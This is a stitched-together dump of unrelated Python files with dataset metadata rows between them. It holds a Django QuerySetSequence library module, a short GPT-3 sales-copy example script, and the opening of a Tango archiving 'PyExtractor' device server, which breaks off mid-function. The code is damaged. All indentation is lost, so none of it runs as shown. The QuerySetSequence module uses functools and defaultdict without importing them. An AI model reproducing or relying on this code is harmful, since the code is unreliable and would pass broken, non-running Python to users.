from itertools import dropwhile
from operator import __not__, attrgetter, eq, ge, gt, itemgetter, le, lt, mul
import django
from django.core.exceptions import (FieldError, MultipleObjectsReturned,
ObjectDoesNotExist)
from django.db import transaction
from django.db.models.base import Model
from django.db.models.constants import LOOKUP_SEP
from django.db.models.query import EmptyQuerySet, QuerySet
# Only export the public API for QuerySetSequence. (Note that QuerySequence and
# QuerySetSequenceModel are considered semi-public: the APIs probably won't
# change, but implementation is not guaranteed. Other functions/classes are
# considered implementation details.)
__all__ = ['QuerySetSequence']
def cmp(a, b):
"""Python 3 version of cmp built-in."""
return (a > b) - (a < b)
def multiply_iterables(it1, it2):
"""
Element-wise iterables multiplications.
"""
assert len(it1) == len(it2),\
"Can not element-wise multiply iterables of different length."
return list(map(mul, it1, it2))
def cumsum(seq):
s = 0
for c in seq:
s += c
yield s
class BaseIterable:
def __init__(self, querysetsequence):
# Create a clone so that subsequent calls to iterate are kept separate.
self._querysets = querysetsequence._querysets
self._queryset_idxs = querysetsequence._queryset_idxs
self._order_by = querysetsequence._order_by
self._standard_ordering = querysetsequence._standard_ordering
self._low_mark = querysetsequence._low_mark
self._high_mark = querysetsequence._high_mark
@staticmethod
def _get_fields(obj, *field_names):
"""Retrieve the values of fields from the object."""
raise NotImplementedError()
def _add_queryset_index(self, obj, value):
"""Add the QuerySet index to the object and return the object."""
raise NotImplementedError()
@classmethod
def _get_field_names(cls, model):
"""Return a list of field names that are part of a model."""
return [f.name for f in model._meta.get_fields()]
@classmethod
def _cmp(cls, value1, value2):
"""
Comparison method that takes into account Django's special rules when
ordering by a field that is a model:
1. Try following the default ordering on the related model.
2. Order by the model's primary key, if there is no Meta.ordering.
"""
if isinstance(value1, Model) and isinstance(value2, Model):
field_names = value1._meta.ordering
# Assert that the ordering is the same between different models.
if field_names != value2._meta.ordering:
valid_field_names = (set(cls._get_field_names(value1)) &
set(cls._get_field_names(value2)))
raise FieldError(
"Ordering differs between models. Choices are: %s" %
', '.join(valid_field_names))
# By default, order by the pk.
if not field_names:
field_names = ['pk']
# TODO Figure out if we don't need to generate this comparator every
# time.
return cls._generate_comparator(field_names)(value1, value2)
return cmp(value1, value2)
@classmethod
def _generate_comparator(cls, field_names):
"""
Construct a comparator function based on the field names. The comparator
returns the first non-zero comparison value.
Inputs:
field_names (iterable of strings): The field names to sort on.
Returns:
A comparator function.
"""
# Ensure that field names is a list and not a tuple.
field_names = list(field_names)
# For fields that start with a '-', reverse the ordering of the
# comparison.
reverses = [1] * len(field_names)
for i, field_name in enumerate(field_names):
if field_name[0] == '-':
reverses[i] = -1
field_names[i] = field_name[1:]
field_names = [f.replace(LOOKUP_SEP, '.') for f in field_names]
def comparator(i1, i2):
# Get a tuple of values for comparison.
v1 = cls._get_fields(i1, *field_names)
v2 = cls._get_fields(i2, *field_names)
# If there's only one arg supplied, a single item is returned,
# directly return the result in this case.
if len(field_names) == 1:
return cls._cmp(v1, v2) * reverses[0]
# Compare each field for the two items, reversing if necessary.
order = multiply_iterables(list(map(cls._cmp, v1, v2)), reverses)
try:
# The first non-zero element.
return next(dropwhile(__not__, order))
except StopIteration:
# Everything was equivalent.
return 0
return comparator
def _ordered_iterator(self):
"""
Interleave the values of each QuerySet in order to handle the requested
ordering. Also adds the '#' property to each returned item.
"""
# A list of tuples, each with:
# * The iterable
# * The QuerySet number
# * The next value
#
# (Remember that each QuerySet is already sorted.)
iterables = []
for i, qs in zip(self._queryset_idxs, self._querysets):
it = iter(qs)
try:
value = next(it)
except StopIteration:
# If this is already empty, just skip it.
continue
# Set the QuerySet number so that the comparison works properly.
value = self._add_queryset_index(value, i)
iterables.append((it, i, value))
# The offset of items returned.
index = 0
# Create a comparison function based on the requested ordering.
_comparator = self._generate_comparator(self._order_by)
def comparator(tuple_1, tuple_2):
# The last element in each tuple is the actual item to compare.
return _comparator(tuple_1[2], tuple_2[2])
comparator = functools.cmp_to_key(comparator)
# If in reverse mode, get the last value instead of the first value from
# ordered_values below.
if self._standard_ordering:
next_value_ind = 0
else:
next_value_ind = -1
# Continue until all iterables are empty.
while iterables:
# If there's only one iterator left, don't bother sorting.
if len(iterables) > 1:
# Sort the current values for each iterable.
iterables = sorted(iterables, key=comparator)
# The next ordering item is in the first position, unless we're
# in reverse mode.
it, i, value = iterables[next_value_ind]
else:
it, i, value = iterables[0]
# Return the next value if we're within the slice of interest.
if self._low_mark <= index:
yield value
index += 1
# We've left the slice of interest, we're done.
if index == self._high_mark:
return
# Iterate the iterable that just lost a value.
try:
value = next(it)
# Set the QuerySet number so that the comparison works properly.
value = self._add_queryset_index(value, i)
iterables[next_value_ind] = it, i, value
except StopIteration:
# This iterator is done, remove it.
del iterables[next_value_ind]
def _unordered_iterator(self):
"""
Return the value of each QuerySet, but also add the '#' property to each
return item.
"""
for i, qs in zip(self._queryset_idxs, self._querysets):
for item in qs:
yield self._add_queryset_index(item, i)
def __iter__(self):
# If there's no QuerySets, just return an empty iterator.
if not len(self._querysets):
return iter([])
# If order is necessary, evaluate and start feeding data back.
if self._order_by:
# If the first element of order_by is '#', this means first order by
# QuerySet. If it isn't this, then returned the interleaved
# iterator.
if self._order_by[0].lstrip('-') != '#':
return self._ordered_iterator()
# Otherwise, order by QuerySet first. Handle reversing the
# QuerySets, if necessary.
elif self._order_by[0].startswith('-'):
self._querysets = self._querysets[::-1]
# If there is no ordering, or the ordering is specific to each QuerySet,
# evaluation can be pushed off further.
# If there is no slicing, iterate through each QuerySet. This avoids
# calling count() on each QuerySet.
if self._low_mark == 0 and self._high_mark is None:
return self._unordered_iterator()
# First trim any QuerySets based on the currently set limits!
counts = [0]
counts.extend(cumsum([it.count() for it in self._querysets]))
# Trim the beginning of the QuerySets, if necessary.
start_index = 0
low_mark, high_mark = self._low_mark, self._high_mark
if low_mark != 0:
# Convert a negative index into a positive.
if low_mark < 0:
low_mark += counts[-1]
# Find the point when low_mark crosses a threshold.
for i, offset in enumerate(counts):
if offset <= low_mark:
start_index = i
if low_mark < offset:
break
# Trim the end of the QuerySets, if necessary.
end_index = len(self._querysets)
if high_mark is None:
# If it was unset (meaning all), set it to the maximum.
high_mark = counts[-1]
elif high_mark:
# Convert a negative index into a positive.
if high_mark < 0:
high_mark += counts[-1]
# Find the point when high_mark crosses a threshold.
for i, offset in enumerate(counts):
if high_mark <= offset:
end_index = i
break
# Remove QuerySets we don't care about.
self._querysets = self._querysets[start_index:end_index]
self._queryset_idxs = self._queryset_idxs[start_index:end_index]
# The low_mark needs the removed QuerySets subtracted from it.
low_mark -= counts[start_index]
# The high_mark needs the count of all QuerySets before it subtracted
# from it.
high_mark -= counts[end_index - 1]
# Apply the offsets to the edge QuerySets (apply the high mark first
# in-case there's only a single QuerySet left).
self._querysets[-1] = self._querysets[-1][:high_mark]
self._querysets[0] = self._querysets[0][low_mark:]
# For anything left, just iterate through each QuerySet.
return self._unordered_iterator()
class ModelIterable(BaseIterable):
@staticmethod
def _get_fields(obj, *field_names):
return attrgetter(*field_names)(obj)
def _add_queryset_index(self, obj, value):
# For models, always add the QuerySet index.
setattr(obj, '#', value)
return obj
class ValuesIterable(BaseIterable):
def __init__(self, querysetsequence):
super().__init__(querysetsequence)
self._fields = querysetsequence._fields
# If no fields are specified (or if '#' is explicitly specified) include
# the QuerySet index.
self._include_qs_index = not self._fields or '#' in self._fields
self._remove_fields = False
# If there are any "order_by" fields which are *not* the fields to be
# returned, they also need to be captured.
if self._order_by:
qss_fields, std_fields = querysetsequence._separate_fields(*self._fields)
qss_order_fields, std_order_fields = querysetsequence._separate_fields(*self._order_by)
extra_fields = [f for f in std_order_fields if f.lstrip('-') not in std_fields]
self._querysets = [qs.values(*std_fields, *extra_fields) for qs in self._querysets]
# If any additional fields are pulled, they'll need to be removed.
self._include_qs_index |= bool(qss_order_fields)
self._remove_fields = bool(extra_fields) or bool(qss_fields)
def __iter__(self):
if not self._remove_fields:
yield from super().__iter__()
return
# The extra fields added for ordering need to be removed.
for it in super().__iter__():
yield {k: it[k] for k in self._fields}
@staticmethod
def _get_fields(obj, *field_names):
return itemgetter(*field_names)(obj)
def _add_queryset_index(self, obj, value):
if self._include_qs_index:
obj['#'] = value
return obj
class ValuesListIterable(BaseIterable):
def __init__(self, querysetsequence):
super().__init__(querysetsequence)
fields = querysetsequence._fields
# Only keep the values from fields.
self._last_field = len(fields)
# The location of the QuerySet index.
try:
self._qs_index = fields.index('#')
except ValueError:
self._qs_index = None
# If there are any "order_by" fields which are *not* the fields to be
# returned, they also need to be captured.
if self._order_by:
# Find any fields which are only used for ordering.
_, std_fields = querysetsequence._separate_fields(*fields)
_, std_order_fields = querysetsequence._separate_fields(*self._order_by)
order_only_fields = [f for f in std_order_fields if f.lstrip('-') not in std_fields]
# Capture both the fields to return as well as the fields used only
# for ordering.
all_fields = std_fields + order_only_fields
self._querysets = [qs.values_list(*std_fields, *order_only_fields) for qs in self._querysets]
# If one of the returned fields is the QuerySet index, insert it so
# that the indexes of the fields after it are correct.
if self._qs_index:
all_fields = all_fields[:self._qs_index] + ('#',) + all_fields[self._qs_index:]
# Convert the order_by field names into indexes, but encoded as strings.
#
# Note that this assumes that the ordering of the values is shallow
# (i.e. nothing returns a Model instance).
order_by_indexes = []
for field in self._order_by:
field_name = field.lstrip('-')
if field_name == '#':
# If the index is not one of the returned fields, add it as
# the last field.
if not self._qs_index:
self._qs_index = len(all_fields)
field_index = self._qs_index
else:
field_index = all_fields.index(field_name)
order_by_indexes.append(
('-' if field[0] == '-' else '') + str(field_index)
)
self._order_by = order_by_indexes
def __iter__(self):
# If there's no particular ordering, do not rebuild the tuples.
if not self._order_by:
yield from super().__iter__()
return
# Remove the fields only used for ordering from the result.
for row in super().__iter__():
yield row[:self._last_field]
@staticmethod
def _get_fields(obj, *field_names):
# Note that BaseIterable.__iter__ strips '-' before getting here, so all
# indexes are positive.
field_indexes = [int(f) for f in field_names]
return itemgetter(*field_indexes)(obj)
def _add_queryset_index(self, obj, value):
# If the QuerySet index needs to be inserted, build a new tuple with it.
if self._qs_index is None:
return obj
return obj[:self._qs_index] + (value, ) + obj[self._qs_index:]
class FlatValuesListIterable(ValuesListIterable):
def __iter__(self):
# Flat values lists can only have a single value in them, yield it.
for row in super().__iter__():
yield row[0]
class NamedValuesListIterable(ValuesListIterable):
pass
class QuerySetSequence:
"""
Wrapper for multiple QuerySets without the restriction on the identity of
the base models.
"""
def __init__(self, *args):
self._set_querysets(args)
# Some information necessary for properly iterating through a QuerySet.
self._order_by = []
self._fields = None
self._standard_ordering = True
self._low_mark, self._high_mark = 0, None
self._iterable_class = ModelIterable
self._result_cache = None
def _set_querysets(self, querysets):
self._querysets = list(querysets)
# The original ordering of the QuerySets.
self._queryset_idxs = list(range(len(self._querysets)))
def _clone(self):
clone = QuerySetSequence(*[qs._clone() for qs in self._querysets])
clone._queryset_idxs = self._queryset_idxs
clone._order_by = self._order_by
clone._fields = self._fields
clone._standard_ordering = self._standard_ordering
clone._low_mark = self._low_mark
clone._high_mark = self._high_mark
clone._iterable_class = self._iterable_class
return clone
def _fetch_all(self):
if self._result_cache is None:
self._result_cache = list(self._iterable_class(self))
@property
def _prefetch_related_lookups(self):
# A hack for ModelChoiceField, which uses internal APIs from QuerySet.
# This should be fixed when https://code.djangoproject.com/ticket/29984
# is fixed.
#
# Note that this really just needs to return a truth-y value if any of
# the QuerySets are using prefetch_related, but this tries to keep the
# type sane at least.
result = ()
for qs in self._querysets:
result += qs._prefetch_related_lookups
return result
# Python magic methods.
def __len__(self):
self._fetch_all()
return len(self._result_cache)
def __iter__(self):
self._fetch_all()
return iter(self._result_cache)
def __bool__(self):
self._fetch_all()
return bool(self._result_cache)
def __getitem__(self, k):
"""
Retrieves an item or slice from the set of results.
"""
if not isinstance(k, (int, slice)):
raise TypeError
assert ((not isinstance(k, slice) and (k >= 0)) or
(isinstance(k, slice) and (k.start is None or k.start >= 0) and
(k.stop is None or k.stop >= 0))), \
"Negative indexing is not supported."
if isinstance(k, slice):
qs = self._clone()
# If start is not given, it is 0.
if k.start is not None:
start = int(k.start)
else:
start = 0
# Apply the new start to any previous slices.
qs._low_mark += start
# If stop is not given, don't modify the stop.
if k.stop is not None:
stop = int(k.stop)
# The high mark needs to take into an account any previous
# offsets of the low mark.
offset = stop - start
qs._high_mark = qs._low_mark + offset
return list(qs)[::k.step] if k.step else qs
qs = self._clone()
qs._low_mark += k
qs._high_mark = qs._low_mark + 1
return list(qs)[0]
def __and__(self, other):
# If the other QuerySet is an EmptyQuerySet, this is a no-op.
if isinstance(other, EmptyQuerySet):
return other
combined = self._clone()
querysets = []
for qs in combined._querysets:
# Only QuerySets of the same type can have any overlap.
if issubclass(qs.model, other.model):
querysets.append(qs & other)
# If none are left, we're left with an EmptyQuerySet.
if not querysets:
return other.none()
combined._set_querysets(querysets)
return combined
def __or__(self, other):
# If the other QuerySet is an EmptyQuerySet, this is a no-op.
if isinstance(other, EmptyQuerySet):
return self
combined = self._clone()
# If the other instance is a QuerySetSequence, combine the QuerySets.
if isinstance(other, QuerySetSequence):
combined._set_querysets(self._querysets + other._querysets)
elif isinstance(other, QuerySet):
combined._set_querysets(self._querysets + [other])
return combined
def _separate_filter_fields(self, **kwargs):
qss_fields, std_fields = self._separate_fields(*kwargs.keys())
# Remove any fields that start with '#' from kwargs.
qss_kwargs = {field: value for field, value in kwargs.items() if field in qss_fields}
std_kwargs = {field: value for field, value in kwargs.items() if field in std_fields}
return qss_kwargs, std_kwargs
def _separate_fields(self, *fields):
# Remove any fields that start with '#' from kwargs.
qss_fields = []
std_fields = []
for field in fields:
if field.startswith('#') or field.startswith('-#'):
qss_fields.append(field)
else:
std_fields.append(field)
return qss_fields, std_fields
def _filter_or_exclude_querysets(self, negate, **kwargs):
"""
Similar to QuerySet._filter_or_exclude, but run over the QuerySets in
the QuerySetSequence instead of over each QuerySet's fields.
"""
# Ensure negate is a boolean.
negate = bool(negate)
for kwarg, value in kwargs.items():
parts = kwarg.split(LOOKUP_SEP)
# Ensure this is being used to filter QuerySets.
if parts[0] != '#':
raise ValueError("Keyword '%s' is not a valid keyword to filter over, "
"it must begin with '#'." % kwarg)
# Don't allow __ multiple times.
if len(parts) > 2:
raise ValueError("Keyword '%s' must not contain multiple "
"lookup separators." % kwarg)
# The actual lookup is the second part.
try:
lookup = parts[1]
except IndexError:
lookup = 'exact'
# Math operators that all have the same logic.
LOOKUP_TO_OPERATOR = {
'exact': eq,
'iexact': eq,
'gt': gt,
'gte': ge,
'lt': lt,
'lte': le,
}
try:
operator = LOOKUP_TO_OPERATOR[lookup]
# These expect integers, this matches the logic in
# IntegerField.get_prep_value(). (Essentially treat the '#'
# field as an IntegerField.)
if value is not None:
value = int(value)
self._queryset_idxs = filter(lambda i: operator(i, value) != negate, self._queryset_idxs)
continue
except KeyError:
# It wasn't one of the above operators, keep trying.
pass
# Some of these seem to get handled as bytes.
if lookup in ('contains', 'icontains'):
value = str(value)
self._queryset_idxs = filter(lambda i: (value in str(i)) != negate, self._queryset_idxs)
elif lookup == 'in':
self._queryset_idxs = filter(lambda i: (i in value) != negate, self._queryset_idxs)
elif lookup in ('startswith', 'istartswith'):
value = str(value)
self._queryset_idxs = filter(lambda i: str(i).startswith(value) != negate, self._queryset_idxs)
elif lookup in ('endswith', 'iendswith'):
value = str(value)
self._queryset_idxs = filter(lambda i: str(i).endswith(value) != negate, self._queryset_idxs)
elif lookup == 'range':
# Inclusive include.
start, end = value
self._queryset_idxs = filter(lambda i: (start <= i <= end) != negate, self._queryset_idxs)
else:
# Any other field lookup is not supported, e.g. date, year, month,
# day, week_day, hour, minute, second, isnull, search, regex, and
# iregex.
raise ValueError("Unsupported lookup '%s'" % lookup)
# Convert back to a list on Python 3.
self._queryset_idxs = list(self._queryset_idxs)
# Finally, keep only the QuerySets we care about!
self._querysets = [self._querysets[i] for i in self._queryset_idxs]
# Methods that return new QuerySets
def filter(self, *args, **kwargs):
qss_fields, fields = self._separate_filter_fields(**kwargs)
clone = self._clone()
clone._filter_or_exclude_querysets(False, **qss_fields)
clone._querysets = [qs.filter(*args, **fields) for qs in clone._querysets]
return clone
def exclude(self, **kwargs):
qss_fields, fields = self._separate_filter_fields(**kwargs)
clone = self._clone()
clone._filter_or_exclude_querysets(True, **qss_fields)
clone._querysets = [qs.exclude(**fields) for qs in clone._querysets]
return clone
def annotate(self, *args, **kwargs):
clone = self._clone()
clone._querysets = [qs.annotate(*args, **kwargs) for qs in clone._querysets]
return clone
if django.VERSION > (3, 2):
def alias(self, *args, **kwargs):
raise NotImplementedError()
def order_by(self, *fields):
_, filtered_fields = self._separate_fields(*fields)
# Apply the filtered fields to each underlying QuerySet.
clone = self._clone()
clone._querysets = [qs.order_by(*filtered_fields) for qs in self._querysets]
# But keep the original fields for the clone.
clone._order_by = list(fields)
return clone
def reverse(self):
clone = self._clone()
clone._querysets = [qs.reverse() for qs in reversed(self._querysets)]
clone._standard_ordering = not self._standard_ordering
return clone
def distinct(self, *fields):
if len({qs.model for qs in self._querysets}) != len(self._querysets):
raise NotImplementedError('Multiple QS of same model unsupported')
clone = self._clone()
clone._querysets = [qs.distinct() for qs in clone._querysets]
return clone
def values(self, *fields, **expressions):
_, std_fields = self._separate_fields(*fields)
clone = self._clone()
clone._querysets = [qs.values(*std_fields, **expressions) for qs in self._querysets]
clone._fields = list(fields) + list(expressions.keys())
clone._iterable_class = ValuesIterable
return clone
def values_list(self, *fields, flat=False, named=False):
if flat and named:
raise TypeError("'flat' and 'named' can't be used together.")
if flat and len(fields) > 1:
raise TypeError("'flat' is not valid when values_list is called with more than one field.")
_, std_fields = self._separate_fields(*fields)
clone = self._clone()
# Note that we always process the flat-ness ourself.
clone._querysets = [qs.values_list(*std_fields, flat=False, named=named) for qs in self._querysets]
clone._fields = list(fields)
clone._iterable_class = (
NamedValuesListIterable if named
else FlatValuesListIterable if flat
else ValuesListIterable
)
return clone
def dates(self, field, kind, order='ASC'):
raise NotImplementedError()
# Django 3.1 added an additional parameter.
if django.VERSION < (3, 1):
def datetimes(self, field_name, kind, order='ASC', tzinfo=None):
raise NotImplementedError()
else:
def datetimes(self, field_name, kind, order='ASC', tzinfo=None, is_dst=None):
raise NotImplementedError()
def none(self):
# This is a bit odd, but use the first QuerySet to properly return an
# that is an instance of EmptyQuerySet.
return self._querysets[0].none()
def all(self):
clone = self._clone()
clone._querysets = [qs.all() for qs in self._querysets]
return clone
def union(self, *other_qs, **kwargs):
raise NotImplementedError()
def intersection(self, *other_qs, **kwargs):
raise NotImplementedError()
def difference(self, *other_qs, **kwargs):
raise NotImplementedError()
def select_related(self, *fields):
clone = self._clone()
clone._querysets = [qs.select_related(*fields) for qs in self._querysets]
return clone
def prefetch_related(self, *lookups):
clone = self._clone()
clone._querysets = [qs.prefetch_related(*lookups) for qs in self._querysets]
return clone
def extra(self, select=None, where=None, params=None, tables=None, order_by=None, select_params=None):
clone = self._clone()
clone._querysets = [qs.extra(select=select, where=where, params=params, tables=tables, order_by=order_by, select_params=select_params) for qs in self._querysets]
return clone
def defer(self, *fields):
clone = self._clone()
clone._querysets = [qs.defer(*fields) for qs in self._querysets]
return clone
def only(self, *fields):
clone = self._clone()
clone._querysets = [qs.only(*fields) for qs in self._querysets]
return clone
def using(self, alias):
clone = self._clone()
clone._querysets = [qs.using(alias) for qs in self._querysets]
return clone
def select_for_update(self, nowait=False, skip_locked=False, of=(), no_key=False):
raise NotImplementedError()
def raw(self, raw_query, params=(), translations=None):
raise NotImplementedError()
# Methods that do not return QuerySets
def get(self, **kwargs):
clone = self.filter(**kwargs)
result = None
for qs in clone._querysets:
try:
obj = qs.get()
except ObjectDoesNotExist:
pass
# Don't catch the MultipleObjectsReturned(), allow it to raise.
else:
# If a second object is found, raise an exception.
if result:
raise MultipleObjectsReturned()
result = obj
# Checked all QuerySets and no object was found.
if result is None:
raise ObjectDoesNotExist()
# Return the only result found.
return result
def create(self, **kwargs):
raise NotImplementedError()
def get_or_create(self, defaults=None, **kwargs):
raise NotImplementedError()
def update_or_create(self, defaults=None, **kwargs):
raise NotImplementedError()
def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
raise NotImplementedError()
def bulk_update(self, objs, fields, batch_size=None):
raise NotImplementedError()
def count(self):
return sum(qs.count() for qs in self._querysets) - self._low_mark
def in_bulk(self, id_list=None, *, field_name='pk'):
raise NotImplementedError()
def iterator(self):
clone = self._clone()
clone._querysets = [qs.iterator() for qs in self._querysets]
return clone
def _get_latest_by(self):
"""Process get_latest_by Meta on each QuerySet and return the value."""
# Get each QuerySet's get_latest_by (ignore unset values).
get_latest_by = map(lambda qs: getattr(qs.model._meta, 'get_latest_by'), self._querysets)
get_latest_by = set(get_latest_by)
# Ensure all of them are identical.
if len(get_latest_by) > 1:
raise ValueError(
"earliest() and latest() require 'get_latest_by' in each "
"model's Meta to be identical.")
# If all the values are None, get_latest_by was not set.
if not get_latest_by:
raise ValueError(
"earliest() and latest() require either fields as positional "
"arguments or 'get_latest_by' in the model's Meta.")
# Cast to a list and return the value.
return list(get_latest_by)
def _get_first_or_last(self, items, order_fields, reverse):
# Generate a comparator and sort the items.
comparator = self._iterable_class._generate_comparator(order_fields)
items = sorted(items, key=functools.cmp_to_key(comparator), reverse=reverse)
# Return the first one (whether this is first or last is controlled by
# reverse).
return items[0]
def latest(self, *fields):
# If fields are given, fallback to get_latest_by.
if not fields:
fields = self._get_latest_by()
objs = []
for qs in self._querysets:
try:
objs.append(qs.latest(*fields))
except ObjectDoesNotExist:
pass
# Checked all QuerySets and no object was found.
if not objs:
raise ObjectDoesNotExist()
# Return the latest.
return self._get_first_or_last(objs, fields, True)
def earliest(self, *fields):
# If fields are given, fallback to get_latest_by.
if not fields:
fields = self._get_latest_by()
objs = []
for qs in self._querysets:
try:
objs.append(qs.earliest(*fields))
except ObjectDoesNotExist:
pass
# Checked all QuerySets and no object was found.
if not objs:
raise ObjectDoesNotExist()
# Return the latest.
return self._get_first_or_last(objs, fields, False)
def first(self):
# If there's no QuerySets, return None. If the QuerySets are unordered,
# use the first item of first QuerySet. If ordered, compare the first
# item of each QuerySet to find the overall first.
if not self._querysets:
return None
elif not self.ordered:
return self._querysets[0].first()
else:
# Get each first item for each and compare them, return the "first".
return self._get_first_or_last(
[qs.first() for qs in self._querysets], self._order_by, False)
def last(self):
# See the comments for first().
if not self._querysets:
return None
elif not self.ordered:
return self._querysets[-1].last()
else:
# Get each last item for each and compare them, return the "last".
return self._get_first_or_last(
[qs.last() for qs in self._querysets], self._order_by, True)
def aggregate(self, *args, **kwargs):
raise NotImplementedError()
def exists(self):
return any(qs.exists() for qs in self._querysets)
def update(self, **kwargs):
with transaction.atomic():
return sum(qs.update(**kwargs) for qs in self._querysets)
def delete(self):
deleted_count = 0
deleted_objects = defaultdict(int)
for qs in self._querysets:
# Delete this QuerySet.
current_deleted_count, current_deleted_objects = qs.delete()
# Combine the results.
deleted_count += current_deleted_count
for obj, count in current_deleted_objects.items():
deleted_objects[obj] += count
return deleted_count, dict(deleted_objects)
def as_manager(self):
raise NotImplementedError()
def explain(self, format=None, **options):
return '\n'.join(qs.explain(format=format, **options) for qs in self._querysets)
# Public attributes
@property
def ordered(self):
"""
Returns True if the QuerySet is ordered -- i.e. has an order_by()
clause.
"""
return bool(self._order_by)
# Methods specific to QuerySetSequence.
def get_querysets(self):
"""Returns a list of the QuerySet objects which form the sequence."""
return self._querysets
| 36.470646 | 169 | 0.602742 |
1846d30be846a869f2df44ce5ae63d8ee1d2c30d | 1,272 | py | Python | examples/Sales_Copy/run_sales_copy.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | examples/Sales_Copy/run_sales_copy.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | examples/Sales_Copy/run_sales_copy.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | ##updated api path, engine, top p
##Runs as expected
import os
import sys
API_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')
sys.path.append(API_PATH)
from api import GPT, Example, UIConfig
# Construct GPT object and show some examples
gpt = GPT(engine="curie-instruct-beta",
temperature=0.7,
top_p=1,
max_tokens=100)
#Create a high converting sales copy for websites
gpt.add_example(Example("""Buffer, Social Media management platform""",
"""“Tell your brand’s story and grow your audience with a publishing, analytics, and engagement platform you can trust."""))
gpt.add_example(Example("""WK Leads, Lead generation software to find qualified leads in your market.""",
"""“Get direct access to decision makers from 30M+ companies in less than 5 minutes with WK Leads."""))
gpt.add_example(Example("""Tye, An AI helping users make more creative sales copy""",
"""“A chatbot that helps you create better, more engaging sales pages and email campaigns in minutes."""))
# Define UI configuration
config = UIConfig(description="Create high converting sales copy for your website.",
button_text="Create",
placeholder="Product, Product description")
id = "sales_copy" | 34.378378 | 124 | 0.712264 |
35383c77a80aeedb98a2316547a2611154750065 | 21,613 | py | Python | PyTangoArchiving/servers/PyExtractor/PyExtractor.py | MaxIV-KitsControls/PyTangoArchiving | 28852dd5fc2c53d19dad8b654584f5d9408e5a7c | [
"CC-BY-3.0"
] | 1 | 2019-09-20T08:11:04.000Z | 2019-09-20T08:11:04.000Z | PyTangoArchiving/servers/PyExtractor/PyExtractor.py | MaxIV-KitsControls/PyTangoArchiving | 28852dd5fc2c53d19dad8b654584f5d9408e5a7c | [
"CC-BY-3.0"
] | null | null | null | PyTangoArchiving/servers/PyExtractor/PyExtractor.py | MaxIV-KitsControls/PyTangoArchiving | 28852dd5fc2c53d19dad8b654584f5d9408e5a7c | [
"CC-BY-3.0"
] | null | null | null | # "$Name: $";
# "$Header: $";
#=============================================================================
#
# file : PyExtractor.py
#
# description : Python source for the PyExtractor and its commands.
# The class is derived from Device. It represents the
# CORBA servant object which will be accessed from the
# network. All commands which can be executed on the
# PyExtractor are implemented in this file.
#
# project : TANGO Device Server
#
# $Author: $
#
# $Revision: $
#
# $Log: $
#
# copyleft : European Synchrotron Radiation Facility
# BP 220, Grenoble 38043
# FRANCE
#
#=============================================================================
# This file is generated by POGO
# (Program Obviously used to Generate tango Object)
#
# (c) - Software Engineering Group - ESRF
#=============================================================================
#
import PyTango
import sys,time
import fandango
import fandango.functional as fn
import fandango.tango as ft
import PyTangoArchiving
import traceback
from fandango.objects import Cached
def decimate_values(values,N=1024,method=None):
"""
values must be a sorted (time,...) array
it will be decimated in N equal time intervals
if method is not provided, only the first value of each interval will be kept
if method is given, it will be applied to buffer to choose the value to keep
first value of buffer will always be the last value kept
"""
tmin,tmax = sorted((values[0][0],values[-1][0]))
result,buff = [values[0]],[values[0]]
interval = float(tmax-tmin)/N
if not method:
for v in values[:-1]:
if v[0]>=(interval+float(result[-1][0])):
#if not len(result)%100: print(interval,result[-1],v)
result.append(v)
result.append(values[-1])
else:
for v in values:
if v[0]>=(interval+float(result[-1][0])):
result.append(method(buff))
buff = [result[-1]]
buff.append(v)
return result
class PyExtractor(PyTango.Device_4Impl):
#--------- Add you global variables here --------------------------
@staticmethod
def dates2times(argin):
"""
Parsing dates like 'Y-M-D h:m' or '+/-X(shmdw)'
"""
return [fn.time2str(fn.str2time(a)) for a in argin]
@staticmethod
def bool2float(argin):
return float(not fn.isFalse(argin))
@staticmethod
def tag2attr(argin):
if any(argin.endswith(s) for s in ('_r','_t','_w','_d','_l','_ld')):
argin = argin.rsplit('_',1)[0]
if '/' not in argin: argin = argin.replace('__','/')
return argin
@staticmethod
def attr2tag(argin):
if '/' in argin: argin = argin.replace('/','__')
return argin
def read_dyn_attr(self,attr):
try:
#attr.set_value(1.0)
aname,values = attr.get_name(),[]
attribute = self.tag2attr(aname)
print time.ctime()+'In read_dyn_attr(%s)'%aname
print(self.counter)
try:
req,atformat,attype,data = self.AttrData[attribute]
except Exception,e:
print('Unable to read %s: key = %s ; cache = %s' % (attr,attribute,self.AttrData.keys()))
traceback.print_exc()
raise e
conv = self.bool2float if attype is PyTango.DevBoolean \
else (float if attype is PyTango.DevDouble
else str)
if aname.endswith('_r'):
if atformat is PyTango.SpectrumAttr:
values = [conv(v[1] or 0.) for v in data]
else:
values = [map(conv,v[1]) for v in data]
if values: print time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'%(aname,type(values[0]),len(values),values[0],values[-1])
else: print '\tno values'
attr.set_value(values,len(values))
elif aname.endswith('_l'):
print('%s: %s' % (aname,data))
if data[-1:]:
value = conv(data[-1][1])
date = float(data[-1][0] or 0.)
q = ft.AttrQuality.ATTR_VALID
else:
value = None
date = fn.now()
q = ft.AttrQuality.ATTR_INVALID
print( time.ctime()+'In read_dyn_attr(%s): (%s,%s,%s)'
% ( aname, value, date, q ) )
attr.set_value_date_quality((value or 0.),date,q)
elif aname.endswith('_w'):
if atformat is PyTango.SpectrumAttr:
values = [conv(v[2] or 0.) for v in data]
else:
values = [map(conv,v[2]) for v in data]
if values: print time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'%(aname,type(values[0]),len(values),values[0],values[-1])
else: print '\tno values'
attr.set_value(values,len(values))
elif aname.endswith('_t'):
values = [float(v[0] or 0.) for v in data]
if values: print time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'%(aname,type(values[0]),len(values),values[0],values[-1])
else: print '\tno values'
attr.set_value(values,len(values))
elif aname.endswith('_d'):
values = [fn.time2str(float(v[0] or 0.)) for v in data]
if values: print time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'%(aname,type(values[0]),len(values),values[0],values[-1])
else: print '\tno values'
attr.set_value(values,len(values))
elif aname.endswith('_ld'):
lv = [fn.time2str(float(v[0] or 0.)) for v in data[-1:]]
if lv:
